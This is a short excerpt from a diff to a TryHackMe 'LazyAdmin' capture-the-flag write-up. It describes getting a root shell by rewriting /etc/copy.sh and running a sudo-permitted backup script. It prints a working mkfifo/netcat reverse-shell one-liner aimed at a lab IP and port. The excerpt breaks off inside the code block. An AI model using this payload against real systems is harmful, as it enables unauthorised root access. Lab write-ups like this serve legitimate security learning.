paRaade/CTF-Writeups/TryHackMe/LazyAdmin.md

 -----
 **Root Reverse Shell**

-I replaced the IP address in the copy .sh script with my IP (tun0) and replaced the contents of the copy. sh script.
-After this I ran netcat.
-Once I ran the the backup .pl script with the sudo command a new reverse shell is created as a root user.
-I can now read the root.txt flag under the root directory
+I updated the IP address in the copy.sh script with my own (tun0) and modified the script's contents.
+Following this, I ran netcat.
+Upon running the backup.pl script with the sudo command, a new reverse shell was generated with root privileges.
+I then gained access to read the root.txt flag located in the root directory."
 ```
 echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.0.39 5554 >/tmp/f" > /etc/copy.sh
 cat /etc/copy.sh